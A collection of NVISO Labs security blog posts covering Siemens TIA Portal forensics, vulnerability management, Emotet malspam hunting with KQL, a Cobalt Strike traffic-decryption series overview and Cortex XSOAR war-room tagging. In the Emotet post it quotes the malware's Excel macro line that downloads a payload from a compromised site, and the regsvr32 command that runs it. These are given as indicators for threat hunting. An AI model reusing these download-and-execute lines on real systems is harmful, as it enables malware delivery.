NVISO has a successful history with Palo Alto Networks, specifically focusing on Cortex solutions. Through everything NVISO does, automation plays a crucial role. As an XSOAR MSSP partner of Palo Alto Networks, NVISO builds on Cortex XSOAR for its own internal efficiency through automation and orchestration, yet also provides automation services to its customers as an MSSP. NVISO offers flexible deployment models, whereby it can provide either dedicated, co-managed (shared responsibility between NVISO and the end customer) or fully outsourced XSOAR deployments.

To achieve Specialization status, Palo Alto Networks partner organizations must have Cortex XDR-certified SOC analysts/threat hunters on staff and available 24/7. Partners seeking this XMDR Specialization distinction must also complete both technical and sales enablement and specialization examinations. Cortex XMDR Specialization partners combine experienced analysts, mature operational processes and proven customer support with Palo Alto Networks market-leading security products, enabling them to provide customers comprehensive visibility, detection and response across network, endpoint and cloud assets, combined with best-in-class threat prevention and in-depth security expertise.

To learn more about NVISOs Managed Services, visit: Managed Detect & Respond | NVISO

NVISO is a European cyber security firm specialized in IT security consultancy and managed security services. Looking to further expand its footprint throughout Europe, NVISO currently has offices in Brussels, Frankfurt and Munich, with new office openings planned later this year.

NVISO’s expert workforce consists of over 160 cyber security professionals, spread over Belgium, Germany, France, Austria and Greece. With world-class expertise as a key differentiator, our experts have obtained most of the well-known certifications in the industry, author and teach SANS courses and regularly present their expertise at conferences.

                                                                        ###

Media Contact:

Carola Wondrak
NVISO

tel:003225884380

[email protected]

✇ NVISO Labs

Investigating an engineering workstation – Part 2

By: Olaf Schwarz

In this second post we will focus on specific evidence written by the TIA Portal. As you might remember, in the first part we covered standard Windows-based artefacts regarding execution of the TIA Portal and usage of projects.

The TIA Portal maintains a file called “Settings.xml” under the following path: C:\Users\$USERNAME\AppData\Roaming\Siemens\Portal V15_1\Settings\. Please remember we used version 15.1 only. The path contains the version number for the TIA Portal, so at least the path will most likely change for different versions. It is also possible that the content and the behaviour of the nodes discussed below changes with different versions of the TIA Portal.

The file can be investigated with a text editor of your choice as it has a plain XML structure. Many nodes contain readable strings, although there are some exceptions that contain encoded binary data.  

A few nodes are of specific interest:

  • “LastOpenedProject”
  • “LRUProjectStorageLocation”
  • “LRUProjectArchiveStorageLocation”
  • “LastProjects”
  • “ConnectionServices”
  • “LoadServices”

We will look at each of these nodes, what information they contain and how they behaved in our testing. As the file is present for a specific user, everything in it is related to that specific user account. So if we state that some information represents the last opened project, it is meant for the specific user the Settings.xml file belongs to and not globally for the entire system.

LastOpenedProject

Figure 1: Settings.xml LastOpenedProject node
Description

This node is located under the SettingNode named "General" and contains one child node. As you can see from the screenshot above, this child node is a full path to an ".ap15_1" file. As the name already implies, this is the last project opened with the TIA Portal. In this example the project root folder is "testproject_09", the storage location of the project is "C:\Users\nviso\Documents\Automation\" and the file used to open the project is "testproject_09.ap15_1".

Content

Last opened project

Behaviour
  • If the TIA Portal is opened and closed without opening a project, the child node will be empty. This also represents exactly what happened: no project was opened.
  • The value is not affected if a project is removed from the recently used projects in the TIA Portal. Removing a project from this list is a native built-in function of the TIA Portal.
Figure 2: TIA Portal dialog to open and remove recently used projects

LRUProjectStorageLocation

Figure 3: Settings.xml LRUProjectStorageLocation node
Description

This node is located under the SettingNode named "General", as a neighbour of the "LastOpenedProject" node we discussed earlier. It also contains only one child node representing the path to the location where the most recently opened project is located. More precisely, it points to the location of the root folder of the project.

Content

Path to folder containing the most recently opened project

Behaviour
  • The value of the child node is not affected if the TIA Portal is opened & closed without opening any project.
  • The value is not affected if a project is removed from the recently used projects in the TIA Portal.

LRUProjectArchiveStorageLocation

Figure 4: Settings.xml LRUProjectArchiveStorageLocation node
Description

This node is located under the SettingNode named "General", as a neighbour of the "LastOpenedProject" node we discussed earlier. If a project file is opened in the TIA Portal and the archive function is used (Main menu bar: Project -> Archive…), the full path to the folder specified in the "Target path" field is written to this value.

Figure 5: TIA Portal Archive Project Dialog
Content

Full path to the most recent folder specified to archive a project.

Behaviour
  • The value is overwritten if a different location is chosen while archiving a project.
  • Unless the archive function is used, the node is not present in the “Settings.xml” file.

LastProjects

Figure 6: Settings.xml LastProjects node
Description

The “LastProjects” node is a child node of the SettingsNode named “ProjectSettings”. The “ProjectSettings” node is located at the same level as the “General” node discussed earlier. As shown in the excerpt above, the node contains a list of full path entries for “.apXX” files. This list shows the opened projects represented in chronological order, with the most recent project on top.

Content

Chronologically ordered list of opened projects

Behaviour
  • The content of this node is not affected when the TIA Portal is opened and closed without opening a project.
  • If a project is removed from the list of recently used projects, the corresponding “String” node containing the full path to the project is removed from the list. The chronological order will still be intact afterwards.
  • Entries in this list are unique. If a project already present in the list is opened again, the entry will be moved to the top position.
  • In our testing we have seen 10+ child nodes for opened projects. We did not test for a maximum value of projects that are tracked in the “LastProjects” node.
  • If a new project is created and saved in the TIA Portal, it will show up in this list, but not show up in the Jump List. (We covered this in part 1 of the series)

ConnectionService

Figure 7: Settings.xml ConnectionService node (parts have been removed for readability)
Description

The "ConnectionService" node is a neighbour of the "ProjectSettings" and the "General" node. It contains child nodes named after the full path of projects. These child nodes can contain the creation date and time of the project in UTC, stored in a child node called "CreationTime". Further, they can contain a child node called "ControllerConfiguration" which might have several child nodes for configured PLCs. These PLC nodes ("{1052700-1391}" in the example above) show information on how to communicate with the PLC, in the node named "OamAddress". As demonstrated in the screenshot, the "OamAddress" node can give us information like the IP-Address and subnet-mask used to reach the PLC.

Content

List of projects that were worked on within the TIA Portal. Under certain circumstances, the creation time of the project in UTC and connection information for configured PLCs are shown.

Behaviour
  • The content of this node and its children is not affected when the TIA Portal is opened and closed without opening a project.
  • The content of this node and its children is not affected if a project is removed from the recently used projects in the TIA Portal.
  • A "SettingNode" entry for a specific project is not added directly after an empty project is created, nor is it added when an empty project is re-opened.
  • A “SettingNode” including the project creation timestamp in UTC is created when you start to configure the project, for example by adding a PLC to it.
  • The creation timestamp is taken from within the project, so if a project file is copied to a different host and opened there, the creation date and time of the original project is listed.
  • The "SettingNode" for a specific project is extended with a "SettingNode" named "ControllerConfiguration" if communication with a configured PLC has been performed, for example using the "go online" function or downloading logic to the PLC.
  • If multiple PLCs are configured, the “ControllerConfiguration” node contains multiple child nodes representing the configuration for each of the PLCs.
  • Our testing has shown that the child nodes containing the information per PLC are not randomly named. If the same PLC is used in multiple projects, the node will get the same name. Applying this to our example above means that if the PLC is added to three different projects, you will find a SettingNode named "{1052700-1391}" in all three "ControllerConfiguration" sections. Of course, only if the conditions to write a "ControllerConfiguration" are met.
  • If a PLC is removed from a project, the corresponding child node under “ControllerConfiguration” is not removed.

LoadServices

Figure 8: Settings.xml LoadServices node
Description

The "LoadService" node is a neighbour of the "ProjectSettings" and the "General" node. It contains child nodes named after the full path of projects. As shown above, these project nodes contain child nodes that are given an ID as a name, like we already saw within the "ConnectionServices" section.

Content

List of projects that were worked on within the TIA Portal.

Behaviour
  • The content of this node and its children is not affected when the TIA Portal is opened and closed without opening a project.
  • The content of this node and its children is not affected if a project is removed from the recently used projects in the TIA Portal.
  • A project will only show up under “LoadServices” if a PLC is added to the project and configuration is done to communicate with the PLC, like setting an IP-Address to its interface.
  • According to our testing, the child nodes of a project node under "LoadServices" are not randomly named and behave the same way as mentioned in the "ConnectionServices" section. The screenshot above shows the same PLC added to two different projects. The name does not match the name assigned to the PLC in the "ConnectionServices" node section.
  • If a PLC is removed from a project, the corresponding child node under “LoadService” is not removed.
  • If a complete project with PLCs configured is copied to a different location on the same machine, opened, and an interaction with the PLC is initiated using the "go online" function, no additional entry is created in the "LoadService" section for the copied project. If the IP-Address configuration for the PLC is changed in the project, an entry will be created though. At the moment it is unclear why this happens. A theory could be that configuring the IP-Address creates the entry, and the first interaction with the PLC just updates the entry if it exists; if no matching entry is found, nothing is done.

Tool

Manually searching in .xml files and highlighting the important nodes is a cumbersome process. In order to provide some help with extracting the interesting parts of a "Settings.xml" file, I took the liberty of creating a small Python tool. You can download the tool from my GitHub repository.

By invoking it with the command below, the discussed nodes are extracted:

python3 ./parse_tSettings.py -f PATH_TO_SETTINGS.XML

Figure 9: Sample output of parse_tSettings.py
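If you prefer to script the extraction yourself, the same idea can be expressed in a few lines of Python. The sketch below is a simplified, hypothetical approach (not the parse_tSettings.py implementation): it walks the XML tree with the standard library's ElementTree and prints every element whose tag or attribute values match one of the node names discussed above.

import sys
import xml.etree.ElementTree as ET

# Node names discussed in this post; extend the set as needed.
INTERESTING = {
    "LastOpenedProject", "LRUProjectStorageLocation",
    "LRUProjectArchiveStorageLocation", "LastProjects",
    "ConnectionService", "LoadService",
}


def dump_interesting_nodes(path: str) -> None:
    tree = ET.parse(path)
    for element in tree.iter():
        # The node names may appear as the element tag or as an attribute value.
        names = {element.tag} | set(element.attrib.values())
        if names & INTERESTING:
            # Collect the text of the element and all of its descendants.
            texts = [text.strip() for text in element.itertext() if text.strip()]
            print(element.tag, element.attrib, texts)


if __name__ == "__main__":
    dump_interesting_nodes(sys.argv[1])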

To close this second blog post, some general notes on the "Settings.xml" file. The file belongs to the user, so no additional privileges are needed to change or delete it. If you delete the file and start the TIA Portal, a fresh "Settings.xml" file is automatically created. It therefore seems pretty easy to manipulate or clean this file; still, the user (or the adversary) first needs to be aware that this file exists and which information it stores! The file is written as part of the tasks performed when the TIA Portal is closed normally. If the TIA Portal crashes, or the process gets killed by other means, the file will not be updated.

Conclusion & Outlook

In this second part we have shown that the "Settings.xml" file stores valuable information and should be considered when analysing machines running the TIA Portal. Further, we have introduced a free tool to extract this data and, as a small bonus, a KAPE target to collect the "Settings.xml" file.

In the third part of this series of blog posts, we will have a look at what data we can extract from projects created with the TIA Portal.

About the Author

Olaf Schwarz is a Senior Incident Response Consultant at NVISO. You can find Olaf on Twitter and LinkedIn.

You can follow NVISO Labs on Twitter to stay up to date on all our future research and publications.

✇ NVISO Labs

Vulnerability Management in a nutshell

By: Michiel Jonkmans

Introduction

Vulnerability Management plays an important role in an organization’s line of defense. However, setting up a Vulnerability Management process can be very time consuming. This blogpost will briefly cover the core principles of Vulnerability Management and how it can help protect your organization against threats and adversaries looking to abuse weaknesses.

What is Vulnerability Management

To better understand Vulnerability Management, it is important to know what it stands for. On the internet, Vulnerability Management has several definitions. Sometimes these can be confusing and misinterpreted because different wording is used across several platforms. Several products exist that can assist an organization in creating a Vulnerability Management Process. Some of the current market leaders include but are not limited to: CrowdStrike, Tenable.IO and Rapid7.

According to Tenable, Vulnerability Management is an ongoing process that includes proactive asset discovery, continuous monitoring, mitigation, remediation and defense tactics to protect your organization’s modern IT attack surface from Cyber Exposure.[1]

According to Rapid7, Vulnerability Management is the process of identifying, evaluating, treating, and reporting on security vulnerabilities in systems and the software that runs on them. This, implemented alongside with other security tactics, is vital for organizations to prioritize possible threats and minimizing their attack surface.[2]

According to CrowdStrike, Vulnerability Management means the ongoing, regular process of identifying, assessing, reporting on, managing and remediating security vulnerabilities across endpoints, workloads, and systems. Typically, a security team will leverage a Vulnerability Management tool to detect vulnerabilities and utilize different processes to patch or remediate them.[3]

Why Vulnerability Management

A well-defined Vulnerability Management process can be leveraged to decrease the cyber exposure of an organization. This ranges from identifying open RDP ports on internet-facing Shadow IT to outdated third-party software installed on the domain controller. In case vulnerabilities are abused by attackers, they could obtain access to the internal network, distribute malware such as Ransomware, obtain sensitive information and the list goes on. Decreasing your exposure and increasing patch management can reduce the likelihood of an attack happening on the organization’s infrastructure.

Vulnerability Management core principles

If we take a look at the definitions above, several terms are being used over and over again. We can summarize Vulnerability Management in 6 steps. As Vulnerability Management is a continuous process, each individual step provides input for subsequent steps. It is important to note that this is a simplified version of Vulnerability Management. The following image illustrates what a Vulnerability Management process can look like:

Figure 1 – Vulnerability Management Process

Identify

Identification of the scope is the first part of the Vulnerability Management cycle. This is an important phase, as you can’t protect what you don’t know. If we take a look at the CIS Critical Security Controls[4], the first step to stop today’s most pervasive and dangerous attacks is to “Actively manage (inventory, track, and correct) all enterprise assets“ – meaning that it is really important for an organization to know what infrastructure they have. The first step in the Vulnerability Management program is to identify all known and unknown assets and start prioritizing them. This can include but is not limited to the following information:

  • Which assets are most critical to the business?
  • Which assets are externally exposed?
  • Which assets have confidential information?

The process of identifying assets can be automated with a combination of discovery scans on the internal network and identification of known and unknown external assets through attack surface management platforms. This phase is a crucial part, as all next steps are based on the scope defined during the identification phase.


Assess

Assessing the infrastructure for weaknesses can be automated through vulnerability scanning with known scanners such as Tenable.IO and Rapid7. However, manual verification might be needed to determine the actual exploitability of vulnerabilities, as vulnerability scanners do not cover all security controls in place, such as specific workarounds that were implemented to limit the likelihood of exploitation. By using a combination of automated scanners and manual verification of the issues, a comprehensive view on what vulnerabilities are currently affecting your organization can be established.

Prioritize

Some organizations might not prioritize their vulnerabilities obtained by automatic scanners or penetration tests. However, as Seth Godin said: “Data is not useful until it becomes information”. It is the task of the Vulnerability Management team to prioritize the vulnerabilities not only on their actual technical impact but also to keep in mind the business impact. For example, a critical Log4J vulnerability on an externally available and well-known website should be remediated sooner than the same Log4J vulnerability on a lunch-serving testing server that is only accessible from the internal network.

Report

After all issues have been prioritized, an actionable report should be given to the teams that will actually perform the patching/resolving of the issues. It is important for the Vulnerability Management team to keep in mind that they should create actionable tickets or remediating actions for the operations team. A bad example of a ticket can be as follows:

Title: Log4J identified

Description: Log4J was identified on your server

Resolution: Please fix this as soon as possible

A good example of a ticket can be something like this[5]:

Title: Apache Log4j Remote Code Execution (Log4Shell)

Severity: Critical

Estimated Time to Fix: 1 hour

Description: Apache Log4j is an open source Java-based logging framework leveraged within numerous Java applications. Apache Log4j versions 2.0-beta9 to 2.15.0 suffer from insufficient protections on message lookup substitutions when dealing with user controlled input. By crafting a malicious string, an attacker could leverage this issue to achieve a remote code execution on the Log4j instance used by the target application.

Solution: Upgrade Apache Log4j to version 2.16.0 or later.

Affected devices: 10.0.0.3, 10.0.9.3

CVEs: CVE-2021-44228

References: https://logging.apache.org/log4j/2.x/security.html


Remediate

Resolving vulnerabilities should be the goal of the entire Vulnerability Management process, as this will decrease the exposure of your organization. Remediation is a process on its own and might consist of automatic patching, process updates, Group Policy updates, …. With the actionable ticketing performed by the Vulnerability Management team in the previous phase, it should be easy for the operations teams to identify what actions need to be done and how long it will take. After successful remediation, a validation of the remediation should be performed by the Vulnerability Management team. If the issue is resolved, the issue can be closed.

Improve

As Vulnerability Management is a continuous process, it should be reviewed all the time. Like Rome, a Vulnerability Management program is not built in one day. However, over time a robust and reliable Vulnerability Management process will be in place if the processes are well defined and known within the organization.


[1] https://www.tenable.com/source/vulnerability-management

[2] https://www.rapid7.com/fundamentals/vulnerability-management-and-scanning/

[3] https://www.crowdstrike.com/cybersecurity-101/vulnerability-management/

[4] https://www.cisecurity.org/controls

[5] https://www.tenable.com/plugins/was/113075

✇ NVISO Labs

Hunting Emotet campaigns with Kusto

By: bparys

Introduction

Emotet doesn’t need an introduction anymore – it is one of the more prolific cybercriminal gangs and has been around for many years. In January 2021, a disruption effort took place via Europol and other law enforcement authorities to take Emotet down for good. [1] Indeed, there was a significant decrease in Emotet malicious spam (malspam) and phishing campaigns for the next few months after the takedown event.

In November 2021 however, Emotet had returned [2] and is once again targeting organisations on a global scale across multiple sectors.

Starting March 10th 2022, we detected a massive malspam campaign that delivers Emotet (and further payloads) via encrypted (password-protected) ZIP files. The campaign continues as of the writing of this blog post on March 23rd, although it appears to be decreasing in frequency. The campaign appears to be initiated by Emotet’s Epoch4 and (mainly) Epoch5 botnet nodes.

In this blog post, we will first have a look at the particular Emotet campaign, and expand on detection and hunting rules using the Kusto Query Language (KQL).

Emotet Campaign

The malspam campaign itself has the following pattern:

  1. An organisation’s email server is abused / compromised to send the initial email
  2. The email has a spoofed display name, purporting to be legitimate
  3. The subject of the email is a reply “RE:” or forward “FW:” and contains the recipient’s email address
  4. The body of the email contains only a few single sentences and a password to open the attachment
  5. The attachment is an encrypted ZIP file, likely an attempt to evade detections, which in turn contains a macro-enabled Excel document (.XLSM)
  6. The Excel will in turn download the Emotet payload
  7. Finally, Emotet may download one of the next stages (e.g. CobaltStrike, SystemBC, or other malware)

Two examples of the email received can be observed in Figure 1. Note the target email address in the subject.

Figure 1 – Two example malspam emails

We have observed emails sent in multiple languages, including, but not limited to: Spanish, Portuguese, German, French, English and Dutch.

The malspam emails are typically sent from compromised email servers across multiple organisations. Some of the top sending domains (based on country code) observed are shown in Figure 2.

Figure 2 – Top sender (compromised) email domains

The attachment naming scheme follows a somewhat irregular pattern: split between text and seemingly random numbers, again potentially to evade detection. A few examples of the text prepended to attachment names are shown in Figure 3.

Figure 3 – Example attachment names

After opening the attachment with the password provided (typically a 3-4 character password), an Excel file with the same name as the ZIP is observed. When opening the Excel file, we are presented with the usual banner to Enable Macros to make use of all features, as can be seen in Figure 4.

Figure 4 – Low effort Excel dropper

Once macros are enabled, the download is triggered via an XLM 4.0 macro in a hidden sheet or cell, as follows:

=CALL("urlmon", "URLDownloadToFileA", "JCCB", 0, "http://<compromised_website>/0Rq5zobAZB/", "..\wn.ocx")

This then results in regsvr32 executing the downloaded OCX file (a DLL):

C:\Windows\SysWow64\regsvr32.exe -s ..\en.ocx

This OCX file is in turn the Emotet payload. Emotet can then, as mentioned, either leverage one of its modules (plugins) for data exfiltration, or download the next malware stage as part of its attack campaign.

We will not analyse the Emotet malware itself, but rather focus on how to hunt for several parts of this campaign using the Kusto Query Language (KQL) in environments that make use of Office 365.

Hunting with KQL

Granted you are ingesting the right logs (license and setup) and have the necessary permissions (Security Reader will suffice), visit the Microsoft 365 Defender Advanced Hunting’s page and query builder: https://security.microsoft.com/v2/advanced-hunting

Query I – Hunting the initial campaign

First, we want to track the scope and size of the initial Emotet campaign. We can build the following query:

EmailAttachmentInfo
| where FileType == "zip" and FileName endswith_cs "zip"
| join kind=inner (EmailEvents | where Subject contains RecipientEmailAddress and DeliveryAction == "Delivered" and EmailDirection == "Inbound") on NetworkMessageId, SenderFromAddress, RecipientEmailAddress

The query above focuses on Step 3 of this campaign: The subject of the email is a reply “RE:” or forward “FW:” and contains the recipient’s email address. In this query, we filter on:

  1. Any email that has a ZIP attachment;
  2. Where the subject contains the recipient’s email address;
  3. Where the email direction is inbound and the mail is delivered (so not junked or blocked).

This yields 22% of emails that have been delivered – the others have either been blocked or junked. However, we know that this campaign is larger and might have been more successful.

This means we need to improve our query. We can now create an improved query like the one below, where the sender display name has an alias (or is spoofed):

EmailAttachmentInfo
| where FileType == "zip" and FileName endswith_cs "zip" and SenderDisplayName startswith_cs "<"
| join kind=inner (EmailEvents | where EmailDirection == "Inbound" and DeliveryAction == "Delivered") on NetworkMessageId, SenderFromAddress, RecipientEmailAddress

This query now results in 25% of emails that have been delivered, for the same timespan (campaign scope & size) as set before. The query can now further be finetuned to show all emails except the blocked ones. Even when malspam or phishing emails are Junked, the user may manually go to the Junk Folder, open the email / attachment and from there get compromised.

The final query:

EmailAttachmentInfo
| where FileType == "zip" and FileName endswith_cs "zip" and SenderDisplayName startswith_cs "<"
| join kind=inner (EmailEvents | where EmailDirection == "Inbound" and DeliveryAction != "Blocked") on NetworkMessageId, SenderFromAddress, RecipientEmailAddress

This query now displays 73% of the whole Emotet malspam campaign. You can now export the result, create statistics and blocking rules, notify users and improve settings or policies where required. An additional user awareness campaign can help to stress that Junked emails should not be opened when it can be avoided.

As an extra, if you merely want to create statistics on Delivered versus Junked versus Blocked, the following query will do just that:

EmailAttachmentInfo
| where FileType == "zip" and FileName endswith_cs "zip" and SenderDisplayName startswith_cs "<"
| join kind=inner (EmailEvents | where EmailDirection == "Inbound") on NetworkMessageId, SenderFromAddress, RecipientEmailAddress
| summarize Count = count() by DeliveryAction

Query II – Filtering on malspam attachment name

This query is of lower fidelity than the others in this blog, as it can produce a large number of False Positives (FPs), depending on your organisation’s geographical location and the amount of email received. Nevertheless, it can be useful to run the query and build further on it to create a baseline. The query below uses an extract of the attachment names from Table 1 and the corresponding hunt:

let attachmentname = dynamic(["adjunto","adjuntos","anhang","archiv","archivo","attachment","avis","aviso","bericht","comentarios","commentaires","comments","correo","data","datei","datos","detail","details","detalle","doc","document","documentación","documentation","documentos","documents","dokument","détails","escanear","fichier","file","filename","hinweis","info","informe","list","lista","liste","mail","mensaje","message","nachricht","notice","pack","paquete","pièce","rapport","report","scan","sin titulo","untitled"]);
EmailAttachmentInfo
| where FileName has_any(attachmentname) and strlen(FileName) < 20 and FileType == "zip"
| join EmailEvents on NetworkMessageId
| where DeliveryAction == "Delivered" and EmailDirection == "Inbound"

Running this rule delivers a considerable amount of results, even when requiring the string length (strlen) to be less than 20 characters, as we have observed in this campaign. To finetune the query, we can add one more line to filter on the display name, as we also did in Query I:

let attachmentname = dynamic(["adjunto","adjuntos","anhang","archiv","archivo","attachment","avis","aviso","bericht","comentarios","commentaires","comments","correo","data","datei","datos","detail","details","detalle","doc","document","documentación","documentation","documentos","documents","dokument","détails","escanear","fichier","file","filename","hinweis","info","informe","list","lista","liste","mail","mensaje","message","nachricht","notice","pack","paquete","pièce","rapport","report","scan","sin titulo","untitled"]);
EmailAttachmentInfo
| where FileName has_any(attachmentname) and strlen(FileName) < 20 and FileType == "zip" and SenderDisplayName startswith_cs "<"
| join EmailEvents on NetworkMessageId
| where DeliveryAction == "Delivered" and EmailDirection == "Inbound"

This now results in 20% True Positives (TP) as opposed to the original query, where we would have needed to filter extensively. Note that this query can be further adapted to your needs; for example, you could remove the SenderDisplayName parameter again, and set other parameters (e.g. string length, email language, …).

Query III – Searching for regsvr32 doing bad things

Most detection & hunting teams, Security Operation Center (SOC) analysts, incident responders and so on will be acquainted with the term “lolbins”, also known as living off the land binaries. In short, any binary that is part of the native Operating System, in this case Windows, and which can be abused for other purposes than what it is intended for.

In this case, regsvr32 is leveraged – it is typically used by attackers to – you guessed it – register and execute DLLs! The query below will leverage a simple regular expression (regex) to hunt for execution of regsvr32 attempting to run an OCX file, as was seen in this Emotet campaign.

DeviceProcessEvents
| where FileName =~ "regsvr32.exe" and ProcessCommandLine matches regex @"\.\.\\.+\.ocx$"
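If you want to check what this regular expression actually matches before deploying the query, the pattern is simple enough to test outside of KQL. The sketch below uses Python's re module (KQL uses the RE2 engine, but for this simple pattern the behaviour is the same); the first sample command line is taken from the campaign described above, the second is a hypothetical benign call.

import re

# Same pattern as in the KQL query: a relative "..\<name>.ocx" at the end of the command line.
pattern = re.compile(r"\.\.\\.+\.ocx$")

samples = [
    r"C:\Windows\SysWow64\regsvr32.exe -s ..\en.ocx",   # Emotet example above: matches
    r"C:\Windows\System32\regsvr32.exe /s legit.dll",   # hypothetical benign call: no match
]

for command_line in samples:
    # re.search scans the whole string, mirroring "matches regex" on ProcessCommandLine.
    print(bool(pattern.search(command_line)), command_line)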

Conclusion

Emotet is still a significant threat to be reckoned with since its return near the end of last year.

This blog post focused on dissecting Emotet’s latest malspam campaign as well as creating hunting queries using KQL to hunt for and respond to any potential security incident. The queries can also be converted to other formats (e.g. Splunk Query Language using https://uncoder.io/ for example) to allow for broader hunting efforts or where using KQL might not be an option.

Thanks to my colleague Maxime Thiebaut (@0xthiebaut) for assistance in building the queries.

About the author

Bart Parys is a manager at NVISO where he mainly focuses on Threat Intelligence, Incident Response and Malware Analysis. As an experienced consumer, curator and creator of Threat Intelligence, Bart has written many TI reports on multiple levels, such as strategic and operational, across a wide variety of sectors and geographies. Twitter: @bartblaze
✇ NVISO Labs

Cobalt Strike: Overview – Part 7

By: didiernviso

This is an overview of a series of 6 blog posts we dedicated to the analysis and decryption of Cobalt Strike traffic. We include videos for different analysis methods.

In part 1, we explain that Cobalt Strike traffic is encrypted using RSA and AES cryptography, and that we found private RSA keys that can help with the decryption of Cobalt Strike traffic.

In part 2, we actually decrypt traffic using private keys. Notice that one of the free, open source tools that we created to decrypt Cobalt Strike traffic, cs-parse-http-traffic.py, was a beta release. It has now been replaced by the tool cs-parse-traffic.py. This tool is capable of decrypting HTTP(S) and DNS traffic. For HTTP(S), it is a drop-in replacement for cs-parse-http-traffic.py.

In part 3, we use process memory dumps to extract the decryption keys. This is for use cases where we don’t have the private keys.

In part 4, we deal with some specific obfuscation: data transforms of encrypted traffic, and sleep mode in beacons’ process memory.

In part 5, we handle Cobalt Strike DNS traffic.

And finally, in part 6, we provide some tips to make memory dumps of Cobalt Strike beacons.

The tools used in these blog post are free and open source, and can be found here.

Here are a couple of videos that illustrate the methods discussed in this series:

YouTube playlist "Cobalt Strike: Decrypting Traffic"

Blog posts in this series:

About the authors

Didier Stevens is a malware expert working for NVISO. Didier is a SANS Internet Storm Center senior handler and Microsoft MVP, and has developed numerous popular tools to assist with malware analysis. You can find Didier on Twitter and LinkedIn.

You can follow NVISO Labs on Twitter to stay up to date on all our future research and publications.

✇ NVISO Labs

Cortex XSOAR Tips & Tricks – Tagging War Room Entries

By: wstinkens

Introduction

The war room in Cortex XSOAR incidents allows a SOC analyst to do additional investigations by using any command available as an automation or integration command. It also contains the output of all tasks used in playbooks (if not in Quiet mode). In this blogpost we will show you how to format output of automations to the war room using the CommandResults class in CommonServerPython, how to add tags to this output and what you can do with these tags.

To support creating tagged war room entries in automations, we have created our own nitro_return_tagged_command_results function which is available on the NVISO Github:

https://github.com/NVISOsecurity/blogposts/blob/master/CortexXSOAR/nitro_return_tagged_command_results.py

CommandResults

The CommonServerPython automation in Cortex XSOAR contains common Python functions and classes created by Palo Alto that are used in multiple built-in automations. They are appended to the code of each integration/automation before being executed.

One of these classes is CommandResults. Together with the return_results function, it can be used to return (formatted) output from an automation to the war room or context data:

results = [
    {
        'FileName': 'malware.exe',
        'FilePath': 'c:\\temp',
        'DetectionStatus': 'Detected'
    },
    {
        'FileName': 'evil.exe',
        'FilePath': 'c:\\temp',
        'DetectionStatus': 'Prevented'
    }
]
title = "Malware Mitigation Status"

command_result = CommandResults(readable_output=tableToMarkdown(title, results, None, removeNull=True),
        outputs_prefix=title,
        outputs=results
    )

return_results(command_result)

By using the outputs_prefix and outputs attributes of the CommandResults class, the following data is created in the Context Data:
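An illustrative approximation of that structure (assumed from the outputs_prefix and outputs values above; the exact representation in the XSOAR UI may differ) is shown below.

# Illustrative approximation of the resulting incident context data:
context_data = {
    "Malware Mitigation Status": [
        {"FileName": "malware.exe", "FilePath": "c:\\temp", "DetectionStatus": "Detected"},
        {"FileName": "evil.exe", "FilePath": "c:\\temp", "DetectionStatus": "Prevented"},
    ]
}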

By using the readable_output attribute of the CommandResults class, the following entry is created in the war room:

By using the actions menu of the war room entry, you can manually add tags:

nitro_return_tagged_command_results()

The functionality to add tags to war room entries is not available in the return_results function in CommonServerPython, so we created a nitro_return_tagged_command_results function which supports adding tags:

def nitro_return_tagged_command_results(command_result: CommandResults, tags: list):
    """
    Return tagged CommandResults

    :type command_result: ``CommandResults``
    :param command_result: CommandResults object to output with tags
    :type tags: ``list``
    :param tags: List of tags to add to war room entry

    """
    result = command_result.to_context()
    result['Tags'] = tags

    demisto.results(result)

This function allows you to provide tags which will be automatically added to the war room entry:

results = [
    {
        'FileName': 'malware.exe',
        'FilePath': 'c:\\temp',
        'DetectionStatus': 'Detected'
    },
    {
        'FileName': 'evil.exe',
        'FilePath': 'c:\\temp',
        'DetectionStatus': 'Prevented'
    }
]
tags_to_add = ['evidence', 'malware']
title = "Malware Mitigation Status"

command_result = CommandResults(
        readable_output=tableToMarkdown(title, results, None, removeNull=True),
    )

nitro_return_tagged_command_results(command_result=command_result, tags=tags_to_add)

We have added this custom function to the CommonServerUserPython automation. This automation is created for user-defined code that is merged into each script and integration during execution. It will allow you to use nitro_return_tagged_command_results in all your custom automations.

Using Entry Tags

Now that you have created tagged war room entries from an automation, what can you do with this?

We use these tagged war room entries to automatically add output from automations as evidence to the incident Evidence Board. The Evidence board can be used by the analyst to store key artifacts for current and future analysis.

First we use the getEntries command to search the war room for the entries with the “evidence” tag.

results = nitro_execute_command(command='getEntries', args={'filter': {'tags': 'evidence'}})

Then we get the entry IDs from the results of getEntries:

entry_ids = [result.get('ID') for result in results]

Finally we loop through all entry IDs of the tagged war room entries and use the AddEvidence command to add them to the evidence board:

for entry_id in entry_ids:
    nitro_execute_command(command='AddEvidence', args={'entryIDs': entry_id, 'desc': 'Example Evidence'})

The tagged war room entry will now be added to the Evidence Board of the incident:

References

https://docs.paloaltonetworks.com/cortex/cortex-xsoar/6-1/cortex-xsoar-admin/incidents/incident-management/war-room-overview.html

https://xsoar.pan.dev/docs/playbooks/playbook-settings

https://xsoar.pan.dev/docs/reference/api/common-server-python

https://xsoar.pan.dev/docs/integrations/code-conventions#commandresults

https://xsoar.pan.dev/docs/integrations/code-conventions#return_results

https://xsoar.pan.dev/docs/reference/scripts/common-server-user-python

About the author

Wouter is an expert in the SOAR engineering team in the NVISO SOC. As the lead engineer and development process lead he is responsible for the design, development and deployment of automated analysis workflows created by the SOAR Engineering team to enable the NVISO SOC analyst to faster detect attackers in customers environments. With his experience in cloud and devops, he has enabled the SOAR engineering team to automate the development lifecycle and increase operational stability of the SOAR platform.

You can reach Wouter via his LinkedIn page.


Want to learn more about SOAR? Sign up here and we will inform you about new content and invite you to our SOAR For Fun and Profit webcast.
https://forms.office.com/r/dpuep3PL5W

✇ NVISO Labs

Investigating an engineering workstation – Part 1

By: Olaf Schwarz

In this series of blog posts we will deal with the investigation of an engineering workstation running Windows 10 with the Siemens TIA Portal Version 15.1 installed. In this first part we will cover some selected classic Windows-based evidence sources, and how they behave with regards to the execution of the TIA Portal and interaction with it. The second part will focus on specific evidence left behind by the TIA Portal itself and how to interpret it. Extracting information from a project and what needs to be considered to draw the right conclusions from this data will be the focus of the third post. Last but not least we will look at the network traffic generated by the TIA portal and what we can do in case the traffic is not being dissected nicely by Wireshark.

